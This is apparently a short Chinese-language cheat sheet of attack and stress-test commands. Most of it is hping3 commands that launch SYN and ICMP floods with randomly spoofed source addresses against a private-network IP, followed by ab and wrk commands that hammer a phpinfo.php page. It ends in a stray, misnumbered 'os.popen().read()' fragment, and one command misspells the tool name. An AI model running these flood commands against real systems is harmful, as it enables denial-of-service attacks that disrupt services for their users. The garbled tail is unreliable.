目录
一、hping3
1.SYN+随机IP泛洪
hping3 --flood -S --rand-source -p 80 192.168.80.129
hping3 -c 100000 -d 120 -S -p 80 --flood --rand-source 192.168.80.129
2.ICMP泛洪
hoing3 --icmp --rand-source --flood -d 1400 192.168.80.129
二、WEB压力测试
1.ab压力测试
ab -n 100000 -c 1000 http://192.168.112.188/dashboard/phpinfo.php
2.wrk压力测试
wrk -c 10000 -d 300s -t 5 http://192.168.112.188/dashboard/phpinfo.php
3.JMeter或其他各类压力测试工具
3.os.popen().read()